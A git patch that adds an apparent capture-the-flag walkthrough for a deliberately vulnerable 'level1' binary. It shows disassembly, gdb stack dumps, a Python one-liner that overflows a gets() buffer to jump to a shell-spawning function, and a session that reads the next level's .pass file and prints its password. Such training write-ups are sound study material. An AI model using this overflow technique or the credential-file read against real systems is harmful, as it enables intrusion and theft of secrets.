From 527e40164b3f63cb1716012d21c39b995a087a59 Mon Sep 17 00:00:00 2001 From: gbrochar Date: Mon, 19 May 2025 16:56:51 +0200 Subject: [PATCH] chore: level1 walktrough --- level1/Ressources/exploit.txt | 1 - level1/Ressources/walktrough.md | 93 +++++++++++++++++++++++++++++++++ 2 files changed, 93 insertions(+), 1 deletion(-) delete mode 100644 level1/Ressources/exploit.txt create mode 100644 level1/Ressources/walktrough.md diff --git a/level1/Ressources/exploit.txt b/level1/Ressources/exploit.txt deleted file mode 100644 index 007843c..0000000 --- a/level1/Ressources/exploit.txt +++ /dev/null @@ -1 +0,0 @@ -D diff --git a/level1/Ressources/walktrough.md b/level1/Ressources/walktrough.md new file mode 100644 index 0000000..1326a00 --- /dev/null +++ b/level1/Ressources/walktrough.md @@ -0,0 +1,93 @@ +Code has 2 functions which are interesting, main and run. +We need to execute run, for this we are going to use a buffer overflow attack. +For this we've got to input more than the 64 bits allocated for gets command. +We are going to override the stack so the ret command jump to run function. + +``` +0x08048480 : push ebp +0x08048481 : mov ebp,esp +0x08048483 : and esp,0xfffffff0 +0x08048486 : sub esp,0x50 +0x08048489 : lea eax,[esp+0x10] +0x0804848d : mov DWORD PTR [esp],eax +0x08048490 : call 0x8048340 +0x08048495 : leave +0x08048496 : ret +``` + +``` +0x08048444 : push ebp +0x08048445 : mov ebp,esp +0x08048447 : sub esp,0x18 +0x0804844a : mov eax,ds:0x80497c0 +0x0804844f : mov edx,eax +0x08048451 : mov eax,0x8048570 +0x08048456 : mov DWORD PTR [esp+0xc],edx +0x0804845a : mov DWORD PTR [esp+0x8],0x13 +0x08048462 : mov DWORD PTR [esp+0x4],0x1 +0x0804846a : mov DWORD PTR [esp],eax +0x0804846d : call 0x8048350 +0x08048472 : mov DWORD PTR [esp],0x8048584 +0x08048479 : call 0x8048360 +0x0804847e : leave +0x0804847f : ret +``` + +Fig 1. Disassembly of main and run functions + +The first step is to find where the ret address is stored, for this, we will +stop the program just before it begins running main and check esp register's +value. + +``` +Reading symbols from /home/user/level1/level1...(no debugging symbols found)...done. +(gdb) b *main+0 +Breakpoint 1 at 0x8048480 +(gdb) run +Starting program: /home/user/level1/level1 + +Breakpoint 1, 0x08048480 in main () +(gdb) p $esp +$1 = (void *) 0xbffff73c +(gdb) +``` + +Now we need to go to the gets and input 64 random characters and try to see them +on the stack + +``` +Breakpoint 1, 0x08048495 in main () +(gdb) x/128xb $esp +0xbffff6e0: 0xf0 0xf6 0xff 0xbf 0x2f 0x00 0x00 0x00 +0xbffff6e8: 0x3c 0xf7 0xff 0xbf 0xf4 0x0f 0xfd 0xb7 +0xbffff6f0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff6f8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff700: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff708: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff710: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff718: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff720: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff728: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 +0xbffff730: 0x00 0x84 0x04 0x08 0x00 0x00 0x00 0x00 +0xbffff738: 0x00 0x00 0x00 0x00 0xd3 0x54 0xe4 0xb7 +0xbffff740: 0x01 0x00 0x00 0x00 0xd4 0xf7 0xff 0xbf +0xbffff748: 0xdc 0xf7 0xff 0xbf 0x58 0xc8 0xfd 0xb7 +0xbffff750: 0x00 0x00 0x00 0x00 0x1c 0xf7 0xff 0xbf +0xbffff758: 0xdc 0xf7 0xff 0xbf 0x00 0x00 0x00 0x00 +``` + +We can see our 64 'A's in the stack, notice there is some space before 0xbffff73c. +That means we still need to put more 'A's, 12 precisely, then the address we want +to jump to. + +```(python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1``` + +```level1@RainFall:~$ (python -c "print('A'*64+'A'*12+'\x44\x84\x04\x08')"; cat) | ./level1 +Good... Wait what? +whoami +level2 +cat /home/user/level2/.pass +53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77 +``` + +:)